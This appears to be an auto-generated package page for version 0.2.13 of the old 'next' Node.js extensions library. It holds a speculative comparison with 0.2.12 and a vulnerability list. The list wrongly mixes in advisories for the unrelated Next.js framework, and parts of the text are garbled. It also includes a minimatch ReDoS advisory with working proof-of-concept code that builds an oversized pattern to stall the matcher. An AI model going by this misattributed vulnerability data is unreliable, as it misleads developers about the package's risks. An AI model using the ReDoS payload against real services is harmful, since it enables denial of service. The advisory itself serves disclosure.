Next version 0.2.13 represents a subtle but potentially important update to the "next" Node.js extensions library compared to its predecessor, version 0.2.12. Both versions share a common foundation for extending Node.js functionalities. They both depend on the same core libraries: "es5-ext" for ECMAScript 5 extensions, "deferred" for managing asynchronous operations, and "minimatch" for file matching using globs. Similarly, both leverage "tad" for development-related tasks. No optional dependencies are listed in either version, and the repository and author information remain constant.
The key difference lies in the release date. Version 0.2.13 was released on April 12, 2012, subsequent to the February 10, 2012 release of version 0.2.12. While the specific changes incorporated in 0.2.13 aren't explicitly detailed in the provided data, the new version likely includes bug fixes, performance enhancements, or minor feature tweaks that improve the library's overall stability and usability.
For developers considering "next," both versions offer well-established extensions for Node.js, but the newer 0.2.13, being the freshest stable version, is probably the prefer choice as it most likely offers improved reliability. As crucial dependency versions haven't been modified, adopting 0.2.13 shouldn't introduce compatibility issues. Developers can acquire the packages from the npm registry using the "tarball" URLs provided. Given the library's age, newer and probably better alternatives exist these days.
All the vulnerabilities related to the version 0.2.13 of the package
Directory Traversal in Next.js
serverless targetnext exportWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.
https://github.com/zeit/next.js/releases/tag/v9.3.2
https://github.com/zeit/next.js/releases/tag/v9.3.2
Next.js Race Condition to Cache Poisoning
Summary
We received a responsible disclosure from Allam Rachid (zhero) for a low-severity race-condition vulnerability in Next.js. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve pageProps data instead of standard HTML.
Credit
Thank you to Allam Rachid (zhero) for the responsible disclosure. This research was rewarded as part of our bug bounty program.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.